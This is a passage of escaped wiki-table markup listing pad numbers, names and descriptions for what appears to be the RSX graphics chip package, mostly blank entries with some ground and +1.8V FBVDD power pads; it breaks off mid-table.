style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H40 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | J<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | J1 || || <br /> |-<br /> | J2 || || <br /> |-<br /> | J3 || || <br /> |-<br /> | J4 || || <br /> |-<br /> | J5 || || <br /> |-<br /> | J6 || || <br /> |-<br /> | J7 || || <br /> |-<br /> | J8 || || <br /> |-<br /> | J9 || || <br /> |-<br /> | J10 || || <br /> |-<br /> | J11 || || <br /> |-<br /> | J12 || || <br /> |-<br /> | J13 || || <br /> |-<br /> | J14 || || <br /> |-<br /> | J15 || || <br /> |-<br /> | J16 || || <br /> |-<br /> | J17 || || <br /> |-<br /> | J18 || || <br /> |-<br /> | J19 || || <br /> |-<br /> | J20 || || <br /> |-<br /> | J21 || || <br /> |-<br /> | J22 || || <br /> |-<br /> | J23 || || <br /> |-<br /> | J24 || || <br /> |-<br /> | J25 || || <br /> |-<br /> | J26 || || <br /> |-<br /> | J27 || || <br /> |-<br /> | J28 || || <br /> |-<br /> | J29 || || <br /> |-<br /> | J30 || || <br /> |-<br /> | J31 || || <br /> |-<br /> | J32 || || <br /> |-<br /> | J33 || || <br /> |-<br /> | J34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J35 || || <br /> |-<br /> | J36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J38 || || <br /> |-<br /> | J39 || || <br /> |-<br /> | J40 || || <br /> |-<br /> | J41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | K<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | K3 || || <br /> |-<br /> | K4 || || <br /> |-<br /> | K5 || || <br /> |-<br /> | K6 || || <br /> |-<br /> | K7 || || <br /> |-<br /> | K8 || || <br /> |-<br /> | K13 || || <br /> |-<br /> | K14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K15 || || <br /> |-<br /> | K16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K17 || || <br /> |-<br /> | K18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K19 || || <br /> |-<br /> | K20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K21 || || <br /> |-<br /> | K22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K23 || || <br /> |-<br /> | K24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K25 || || <br /> |-<br /> | K26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K27 || || <br /> |-<br /> | K28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K29 || || <br /> |-<br /> | K34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | K36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | K37 || FB_MF1 || &amp;gt; Ground <br /> |-<br /> | K38 || FB_SEN1 || &amp;gt; Ground<br /> |-<br /> | K39 || || <br /> |-<br /> | K40 || || <br /> |-<br /> | K41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | L<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | L1 || || <br /> |-<br /> | L2 || || <br /> |-<br /> | L3 || || <br /> |-<br /> | L4 || || <br /> |-<br /> | L5 || || <br /> |-<br /> | L6 || || <br /> |-<br /> | L7 || || <br /> |-<br /> | L8 || || <br /> |-<br /> | L9 || || <br /> |-<br /> | L10 || || <br /> |-<br /> | L11 || || <br /> |-<br /> | L12 || || <br /> |-<br /> | L13 || || <br /> |-<br /> | L14 || || <br /> |-<br /> | L15 || || <br /> |-<br /> | L16 || || <br /> |-<br /> | L17 || || <br /> |-<br /> | L18 || || <br /> |-<br /> | L19 || || <br /> |-<br /> | L20 || || <br /> |-<br /> | L21 || || <br /> |-<br /> | L22 || || <br /> |-<br /> | L23 || || <br /> |-<br /> | L24 || || <br /> |-<br /> | L25 || || <br /> |-<br /> | L26 || || <br /> |-<br /> | L27 || || <br /> |-<br /> | L28 || || <br /> |-<br /> | L29 || || <br /> |-<br /> | L30 || || <br /> |-<br /> | L31 || || <br /> |-<br /> | L32 || || <br /> |-<br /> | L33 || || <br /> |-<br /> | L34 || || <br /> |-<br /> | L35 || || <br /> |-<br /> | L36 || || <br /> |-<br /> | L37 || || <br /> |-<br /> | L38 || || <br /> |-<br /> | L39 || || <br /> |-<br /> | L40 || || <br /> |-<br /> | L41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | M<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | M3 || || <br /> |-<br /> | M4 || || <br /> |-<br /> | M5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M6 || || <br /> |-<br /> | M7 || || <br /> |-<br /> | M8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M12 || || <br /> |-<br /> | M13 || || <br /> |-<br /> | M14 || || <br /> |-<br /> | M15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M16 || || <br /> |-<br /> | M17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M18 || || <br /> |-<br /> | M19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M20 || || <br /> |-<br /> | M21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M22 || || <br /> |-<br /> | M23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M24 || || <br /> |-<br /> | M25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M26 || || <br /> |-<br /> | M27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M28 || || <br /> |-<br /> | M30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M34 || || <br /> |-<br /> | M35 || || <br /> |-<br /> | M36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M38 || || <br /> |-<br /> | M39 || || <br /> |-<br /> | M40 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | N<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | N1 || || <br /> |-<br /> | N2 || || <br /> |-<br /> | N3 || || <br /> |-<br /> | N4 || || <br /> |-<br /> | N5 || || <br /> |-<br /> | N6 || || <br /> |-<br /> | N7 || || <br /> |-<br /> | N8 || || <br /> |-<br /> | N9 || || <br /> |-<br /> | N10 || || <br /> |-<br /> | N11 || || <br /> |-<br /> | N12 || || <br /> |-<br /> | N13 || || <br /> |-<br /> | N14 || || <br /> |-<br /> | N15 || || <br /> |-<br /> | N16 || || <br /> |-<br /> | N17 || || <br /> |-<br /> | N18 || || <br /> |-<br /> | N19 || || <br /> |-<br /> | N20 || || <br /> |-<br /> | N21 || || <br /> |-<br /> | N22 || || <br /> |-<br /> | N23 || || <br /> |-<br /> | N24 || || <br /> |-<br /> | N25 || || <br /> |-<br /> | N26 || || <br /> |-<br /> | N27 || || <br /> |-<br /> | N28 || || <br /> |-<br /> | N29 || || <br /> |-<br /> | N30 || || <br /> |-<br /> | N31 || || <br /> |-<br /> | N32 || || <br /> |-<br /> | N33 || || <br /> |-<br /> | N34 || || <br /> |-<br /> | N35 || || <br /> |-<br /> | N36 || || <br /> |-<br /> | N37 || || <br /> |-<br /> | N38 || || <br /> |-<br /> | N39 || || <br /> |-<br /> | N40 || || <br /> |-<br /> | N41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | P<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | P1 || || <br /> |-<br /> | P2 || || <br /> |-<br /> | P3 || || <br /> |-<br /> | P4 || || <br /> |-<br /> | P5 || || <br /> |-<br /> | P6 || || <br /> |-<br /> | P7 || || <br /> |-<br /> | P8 || || <br /> |-<br /> | P9 || || <br /> |-<br /> | P10 || || <br /> |-<br /> | P11 || || <br /> |-<br /> | P12 || || <br /> |-<br /> | P13 || || <br /> |-<br /> | P14 || || <br /> |-<br /> | P15 || || <br /> |-<br /> | P16 || || <br /> |-<br /> | P17 || || <br /> |-<br /> | P18 || || <br /> |-<br /> | P19 || || <br /> |-<br /> | P20 || || <br /> |-<br /> | P21 || || <br /> |-<br /> | P22 || || <br /> |-<br /> | P23 || || <br /> |-<br /> | P24 || || <br /> |-<br /> | P25 || || <br /> |-<br /> | P26 || || <br /> |-<br /> | P27 || || <br /> |-<br /> | P28 || || <br /> |-<br /> | P29 || || <br /> |-<br /> | P30 || || <br /> |-<br /> | P31 || || <br /> |-<br /> | P32 || || <br /> |-<br /> | P33 || || <br /> |-<br /> | P34 || || <br /> |-<br /> | P35 || || <br /> |-<br /> | P36 || || <br /> |-<br /> | P37 || || <br /> |-<br /> | P38 || || <br /> |-<br /> | P39 || || <br /> |-<br /> | P40 || || <br /> |-<br /> | P41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | R<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | R1 || || <br /> |-<br /> | R2 || || <br /> |-<br /> | R3 || || <br /> |-<br /> | R4 || || <br /> |-<br /> | R5 || || <br /> |-<br /> | R6 || || <br /> |-<br /> | R7 || || <br /> |-<br /> | R8 || || <br /> |-<br /> | R9 || || <br /> |-<br /> | R10 || || <br /> |-<br /> | R11 || || <br /> |-<br /> | R12 || || <br /> |-<br /> | R13 || || <br /> |-<br /> | R14 || || <br /> |-<br /> | R15 || || <br /> |-<br /> | R16 || || <br /> |-<br /> | R17 || || <br /> |-<br /> | R18 || || <br /> |-<br /> | R19 || || <br /> |-<br /> | R20 || || <br /> |-<br /> | R21 || || <br /> |-<br /> | R22 || || <br /> |-<br /> | R23 || || <br /> |-<br /> | R24 || || <br /> |-<br /> | R25 || || <br /> |-<br /> | R26 || || <br /> |-<br /> | R27 || || <br /> |-<br /> | R28 || || <br /> |-<br /> | R29 || || <br /> |-<br /> | R30 || || <br /> |-<br /> | R31 || || <br /> |-<br /> | R32 || || <br /> |-<br /> | R33 || || <br /> |-<br /> | R34 || || <br /> |-<br /> | R35 || || <br /> |-<br /> | R36 || || <br /> |-<br /> | R37 || || <br /> |-<br /> | R38 || || <br /> |-<br /> | R39 || || <br /> |-<br /> | R40 || || <br /> |-<br /> | R41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | T<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | T1 || || <br /> |-<br /> | T2 || || <br /> |-<br /> | T3 || || <br /> |-<br /> | T4 || || <br /> |-<br /> | T5 || || <br /> |-<br /> | T6 || || <br /> |-<br /> | T7 || || <br /> |-<br /> | T8 || || <br /> |-<br /> | T9 || || <br /> |-<br /> | T10 || || <br /> |-<br /> | T11 || || <br /> |-<br /> | T12 || || <br /> |-<br /> | T13 || || <br /> |-<br /> | T14 || || <br /> |-<br /> | T15 || || <br /> |-<br /> | T16 || || <br /> |-<br /> | T17 || || <br /> |-<br /> | T18 || || <br /> |-<br /> | T19 || || <br /> |-<br /> | T20 || || <br /> |-<br /> | T21 || || <br /> |-<br /> | T22 || || <br /> |-<br /> | T23 || || <br /> |-<br /> | T24 || || <br /> |-<br /> | T25 || || <br /> |-<br /> | T26 || || <br /> |-<br /> | T27 || || <br /> |-<br /> | T28 || || <br /> |-<br /> | T29 || || <br /> |-<br /> | T30 || || <br /> |-<br /> | T31 || || <br /> |-<br /> | T32 || || <br /> |-<br /> | T33 || || <br /> |-<br /> | T34 || || <br /> |-<br /> | T35 || || <br /> |-<br /> | T36 || || <br /> |-<br /> | T37 || || <br /> |-<br /> | T38 || || <br /> |-<br /> | T39 || || <br /> |-<br /> | T40 || || <br /> |-<br /> | T41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | U<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | U1 || || <br /> |-<br /> | U2 || || <br /> |-<br /> | U3 || || <br /> |-<br /> | U4 || || <br /> |-<br /> | U5 || || <br /> |-<br /> | U6 || || <br /> |-<br /> | U7 || || <br /> |-<br /> | U8 || || <br /> |-<br /> | U9 || || <br /> |-<br /> | U10 || || <br /> |-<br /> | U11 || || <br /> |-<br /> | U12 || || <br /> |-<br /> | U13 || || <br /> |-<br /> | U14 || || <br /> |-<br /> | U15 || || <br /> |-<br /> | U16 || || <br /> |-<br /> | U17 || || <br /> |-<br /> | U18 || || <br /> |-<br /> | U19 || || <br /> |-<br /> | U20 || || <br /> |-<br /> | U21 || || <br /> |-<br /> | U22 || || <br /> |-<br /> | U23 || || <br /> |-<br /> | U24 || || <br /> |-<br /> | U25 || || <br /> |-<br /> | U26 || || <br /> |-<br /> | U27 || || <br /> |-<br /> | U28 || || <br /> |-<br /> | U29 || || <br /> |-<br /> | U30 || || <br /> |-<br /> | U31 || || <br /> |-<br /> | U32 || || <br /> |-<br /> | U33 || || <br /> |-<br /> | U34 || || <br /> |-<br /> | U35 || || <br /> |-<br /> | U36 || || <br /> |-<br /> | U37 || || <br /> |-<br /> | U38 || || <br /> |-<br /> | U39 || || <br /> |-<br /> | U40 || || <br /> |-<br /> | U41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | V<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | V1 || || <br /> |-<br /> | V2 || || <br /> |-<br /> | V3 || || <br /> |-<br /> | V4 || || <br /> |-<br /> | V5 || || <br /> |-<br /> | V6 || || <br /> |-<br /> | V7 || || <br /> |-<br /> | V8 || || <br /> |-<br /> | V9 || || <br /> |-<br /> | V10 || || <br /> |-<br /> | V11 || || <br /> |-<br /> | V12 || || <br /> |-<br /> | V13 || || <br /> |-<br /> | V14 || || <br /> |-<br /> | V15 || || <br /> |-<br /> | V16 || || <br /> |-<br /> | V17 || || <br /> |-<br /> | V18 || || <br /> |-<br /> | V19 || || <br /> |-<br /> | V20 || || <br /> |-<br /> | V21 || || <br /> |-<br /> | V22 || || <br /> |-<br /> | V23 || || <br /> |-<br /> | V24 || || <br /> |-<br /> | V25 || || <br /> |-<br /> | V26 || || <br /> |-<br /> | V27 || || <br /> |-<br /> | V28 || || <br /> |-<br /> | V29 || || <br /> |-<br /> | V30 || || <br /> |-<br /> | V31 || || <br /> |-<br /> | V32 || || <br /> |-<br /> | V33 || || <br /> |-<br /> | V34 || || <br /> |-<br /> | V35 || || <br /> |-<br /> | V36 || || <br /> |-<br /> | V37 || || <br /> |-<br /> | V38 || || <br /> |-<br /> | V39 || || <br /> |-<br /> | V40 || || <br /> |-<br /> | V41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | W<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | W1 || || <br /> |-<br /> | W2 || || <br /> |-<br /> | W3 || || <br /> |-<br /> | W4 || || <br /> |-<br /> | W5 || || <br /> |-<br /> | W6 || || <br /> |-<br /> | W7 || || <br /> |-<br /> | W8 || || <br /> |-<br /> | W9 || || <br /> |-<br /> | W10 || || <br /> |-<br /> | W11 || || <br /> |-<br /> | W12 || || <br /> |-<br /> | W13 || || <br /> |-<br /> | W14 || || <br /> |-<br /> | W15 || || <br /> |-<br /> | W16 || || <br /> |-<br /> | W17 || || <br /> |-<br /> | W18 || || <br /> |-<br /> | W19 || || <br /> |-<br /> | W20 || || <br /> |-<br /> | W21 || || <br /> |-<br /> | W22 || || <br /> |-<br /> | W23 || || <br /> |-<br /> | W24 || || <br /> |-<br /> | W25 || || <br /> |-<br /> | W26 || || <br /> |-<br /> | W27 || || <br /> |-<br /> | W28 || || <br /> |-<br /> | W29 || || <br /> |-<br /> | W30 || || <br /> |-<br /> | W31 || || <br /> |-<br /> | W32 || || <br /> |-<br /> | W33 || || <br /> |-<br /> | W34 || || <br /> |-<br /> | W35 || || <br /> |-<br /> | W36 || || <br /> |-<br /> | W37 || || <br /> |-<br /> | W38 || || <br /> |-<br /> | W39 || || <br /> |-<br /> | W40 || || <br /> |-<br /> | W41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | Y<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | Y1 || || <br /> |-<br /> | Y2 || || <br /> |-<br /> | Y3 || || <br /> |-<br /> | Y4 || || <br /> |-<br /> | Y5 || || <br /> |-<br /> | Y6 || || <br /> |-<br /> | Y7 || || <br /> |-<br /> | Y8 || || <br /> |-<br /> | Y9 || || <br /> |-<br /> | Y10 || || <br /> |-<br /> | Y11 || || <br /> |-<br /> | Y12 || || <br /> |-<br /> | Y13 || || <br /> |-<br /> | Y14 || || <br /> |-<br /> | Y15 || || <br /> |-<br /> | Y16 || || <br /> |-<br /> | Y17 || || <br /> |-<br /> | Y18 || || <br /> |-<br /> | Y19 || || <br /> |-<br /> | Y20 || || <br /> |-<br /> | Y21 || || <br /> |-<br /> | Y22 || || <br /> |-<br /> | Y23 || || <br /> |-<br /> | Y24 || || <br /> |-<br /> | Y25 || || <br /> |-<br /> | Y26 || || <br /> |-<br /> | Y27 || || <br /> |-<br /> | Y28 || || <br /> |-<br /> | Y29 || || <br /> |-<br /> | Y30 || || <br /> |-<br /> | Y31 || || <br /> |-<br /> | Y32 || || <br /> |-<br /> | Y33 || || <br /> |-<br /> | Y34 || || <br /> |-<br /> | Y35 || || <br /> |-<br /> | Y36 || || <br /> |-<br /> | Y37 || || <br /> |-<br /> | Y38 || || <br /> |-<br /> | Y39 || || <br /> |-<br /> | Y40 || || <br /> |-<br /> | Y41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | Z<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | Z1 || || <br /> |-<br /> | Z2 || || <br /> |-<br /> | Z3 || || <br /> |-<br /> | Z4 || || <br /> |-<br /> | Z5 || || <br /> |-<br /> | Z6 || || <br /> |-<br /> | Z7 || || <br /> |-<br /> | Z8 || || <br /> |-<br /> | Z9 || || <br /> |-<br /> | Z10 || || <br /> |-<br /> | Z11 || || <br /> |-<br /> | Z12 || || <br /> |-<br /> | Z13 || || <br /> |-<br /> | Z14 || || <br /> |-<br /> | Z15 || || <br /> |-<br /> | Z16 || || <br /> |-<br /> | Z17 || || <br /> |-<br /> | Z18 || || <br /> |-<br /> | Z19 || || <br /> |-<br /> | Z20 || || <br /> |-<br /> | Z21 || || <br /> |-<br /> | Z22 || || <br /> |-<br /> | Z23 || || <br /> |-<br /> | Z24 || || <br /> |-<br /> | Z25 || || <br /> |-<br /> | Z26 || || <br /> |-<br /> | Z27 || || <br /> |-<br /> | Z28 || || <br /> |-<br /> | Z29 || || <br /> |-<br /> | Z30 || || <br /> |-<br /> | Z31 || || <br /> |-<br /> | Z32 || || <br /> |-<br /> | Z33 || || <br /> |-<br /> | Z34 || || <br /> |-<br /> | Z35 || || <br /> |-<br /> | Z36 || || <br /> |-<br /> | Z37 || || <br /> |-<br /> | Z38 || || <br /> |-<br /> | Z39 || || <br /> |-<br /> | Z40 || || <br /> |-<br /> | Z41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AA<br /> |-! Pad # !! Name !! Description<br /> |-<br /> | AA1 || ||<br /> |-<br /> | AA2 || ||<br /> |-<br /> | AA3 || ||<br /> |-<br /> | AA4 || ||<br /> |-<br /> | AA5 || ||<br /> |-<br /> | AA6 || ||<br /> |-<br /> | AA7 || ||<br /> |-<br /> | AA8 || || <br /> |-<br /> | AA9 || ||<br /> |-<br /> | AA10 || || <br /> |-<br /> | AA11 || ||<br /> |-<br /> | AA12 || || <br /> |-<br /> | AA13 || ||<br /> |-<br /> | AA14 || || <br /> |-<br /> | AA15 || || <br /> |-<br /> | AA16 || || <br /> |-<br /> | AA17 || || <br /> |-<br /> | AA18 || || <br /> |-<br /> | AA19 || || <br /> |-<br /> | AA20 || || <br /> |-<br /> | AA21 || || <br /> |-<br /> | AA22 || || <br /> |-<br /> | AA23 || || <br /> |-<br /> | AA24 || || <br /> |-<br /> | AA25 || || <br /> |-<br /> | AA26 || || <br /> |-<br /> | AA27 || || <br /> |-<br /> | AA28 || || <br /> |-<br /> | AA29 || || <br /> |-<br /> | AA30 || || <br /> |-<br /> | AA31 || || <br /> |-<br /> | AA32 || || <br /> |-<br /> | AA33 || || <br /> |-<br /> | AA34 || || <br /> |-<br /> | AA35 || || <br /> |-<br /> | AA36 || || <br /> |-<br /> | AA37 || || <br /> |-<br /> | AA38 || || <br /> |-<br /> | AA39 || || <br /> |-<br /> | AA40 || || <br /> |-<br /> | AA41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AB<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AB1 || || <br /> |-<br /> | AB2 || || <br /> |-<br /> | AB3 || || <br /> |-<br /> | AB4 || || <br /> |-<br /> | AB5 || || <br /> |-<br /> | AB6 || || <br /> |-<br /> | AB8 || || <br /> |-<br /> | AB10 || || <br /> |-<br /> | AB11 || || <br /> |-<br /> | AB12 || || <br /> |-<br /> | AB13 || || <br /> |-<br /> | AB14 || || <br /> |-<br /> | AB15 || || <br /> |-<br /> | AB16 || || <br /> |-<br /> | AB17 || || <br /> |-<br /> | AB18 || || <br /> |-<br /> | AB19 || || <br /> |-<br /> | AB20 || || <br /> |-<br /> | AB21 || || <br /> |-<br /> | AB22 || || <br /> |-<br /> | AB23 || || <br /> |-<br /> | AB24 || || <br /> |-<br /> | AB25 || || <br /> |-<br /> | AB26 || || <br /> |-<br /> | AB27 || || <br /> |-<br /> | AB28 || || <br /> |-<br /> | AB29 || || <br /> |-<br /> | AB30 || || <br /> |-<br /> | AB31 || || <br /> |-<br /> | AB32 || || <br /> |-<br /> | AB33 || || <br /> |-<br /> | AB34 || || <br /> |-<br /> | AB35 || || <br /> |-<br /> | AB36 || || <br /> |-<br /> | AB37 || || <br /> |-<br /> | AB38 || || <br /> |-<br /> | AB39 || || <br /> |-<br /> | AB40 || || <br /> |-<br /> | AB41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AC<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AC1 || || <br /> |-<br /> | AC2 || || <br /> |-<br /> | AC3 || || <br /> |-<br /> | AC4 || || <br /> |-<br /> | AC5 || || <br /> |-<br /> | AC6 || || <br /> |-<br /> | AC7 || || <br /> |-<br /> | AC8 || || <br /> |-<br /> | AC9 || || <br /> |-<br /> | AC10 || || <br /> |-<br /> | AC11 || || <br /> |-<br /> | AC12 || || <br /> |-<br /> | AC13 || || <br /> |-<br /> | AC14 || || <br /> |-<br /> | AC15 || || <br /> |-<br /> | AC16 || || <br /> |-<br /> | AC17 || || <br /> |-<br /> | AC18 || || <br /> |-<br /> | AC19 || || <br /> |-<br /> | AC20 || || <br /> |-<br /> | AC21 || || <br /> |-<br /> | AC22 || || <br /> |-<br /> | AC23 || || <br /> |-<br /> | AC24 || || <br /> |-<br /> | AC25 || || <br /> |-<br /> | AC26 || || <br /> |-<br /> | AC27 || || <br /> |-<br /> | AC28 || || <br /> |-<br /> | AC29 || || <br /> |-<br /> | AC30 || || <br /> |-<br /> | AC31 || || <br /> |-<br /> | AC32 || || <br /> |-<br /> | AC33 || || <br /> |-<br /> | AC34 || || <br /> |-<br /> | AC35 || || <br /> |-<br /> | AC36 || || <br /> |-<br /> | AC37 || || <br /> |-<br /> | AC38 || || <br /> |-<br /> | AC39 || || <br /> |-<br /> | AC40 || || <br /> |-<br /> | AC41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AD<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AD1 || || <br /> |-<br /> | AD2 || || <br /> |-<br /> | AD3 || || <br /> |-<br /> | AD4 || || <br /> |-<br /> | AD5 || || <br /> |-<br /> | AD6 || || <br /> |-<br /> | AD7 || || <br /> |-<br /> | AD8 || || <br /> |-<br /> | AD9 || || <br /> |-<br /> | AD10 || || <br /> |-<br /> | AD11 || || <br /> |-<br /> | AD12 || || <br /> |-<br /> | AD13 || || <br /> |-<br /> | AD14 || || <br /> |-<br /> | AD15 || || <br /> |-<br /> | AD16 || || <br /> |-<br /> | AD17 || || <br /> |-<br /> | AD18 || || <br /> |-<br /> | AD19 || || <br /> |-<br /> | AD20 || || <br /> |-<br /> | AD21 || || <br /> |-<br /> | AD22 || || <br /> |-<br /> | AD23 || || <br /> |-<br /> | AD24 || || <br /> |-<br /> | AD25 || || <br /> |-<br /> | AD26 || || <br /> |-<br /> | AD27 || || <br /> |-<br /> | AD28 || || <br /> |-<br /> | AD29 || || <br /> |-<br /> | AD30 || || <br /> |-<br /> | AD31 || || <br /> |-<br /> | AD32 || || <br /> |-<br /> | AD33 || || <br /> |-<br /> | AD34 || || <br /> |-<br /> | AD35 || || <br /> |-<br /> | AD36 || || <br /> |-<br /> | AD37 || || <br /> |-<br /> | AD38 || || <br /> |-<br /> | AD39 || || <br /> |-<br /> | AD40 || || <br /> |-<br /> | AD41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AE<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AE1 || || <br /> |-<br /> | AE2 || || <br /> |-<br /> | AE3 || || <br /> |-<br /> | AE4 || || <br /> |-<br /> | AE5 || || <br /> |-<br /> | AE6 || || <br /> |-<br /> | AE7 || || <br /> |-<br /> | AE8 || || <br /> |-<br /> | AE9 || || <br /> |-<br /> | AE10 || || <br /> |-<br /> | AE11 || || <br /> |-<br /> | AE12 || || <br /> |-<br /> | AE13 || || <br /> |-<br /> | AE14 || || <br /> |-<br /> | AE15 || || <br /> |-<br /> | AE16 || || <br /> |-<br /> | AE17 || || <br /> |-<br /> | AE18 || || <br /> |-<br /> | AE19 || || <br /> |-<br /> | AE20 || || <br /> |-<br /> | AE21 || || <br /> |-<br /> | AE22 || || <br /> |-<br /> | AE23 || || <br /> |-<br /> | AE24 || || <br /> |-<br /> | AE25 || || <br /> |-<br /> | AE26 || || <br /> |-<br /> | AE27 || || <br /> |-<br /> | AE28 || || <br /> |-<br /> | AE29 || || <br /> |-<br /> | AE30 || || <br /> |-<br /> | AE31 || || <br /> |-<br /> | AE32 || || <br /> |-<br /> | AE33 || || <br /> |-<br /> | AE34 || || <br /> |-<br /> | AE35 || || <br /> |-<br /> | AE36 || || <br /> |-<br /> | AE37 || || <br /> |-<br /> | AE38 || || <br /> |-<br /> | AE39 || || <br /> |-<br /> | AE40 || || <br /> |-<br /> | AE41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AF<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AF1 || || <br /> |-<br /> | AF2 || || <br /> |-<br /> | AF3 || || <br /> |-<br /> | 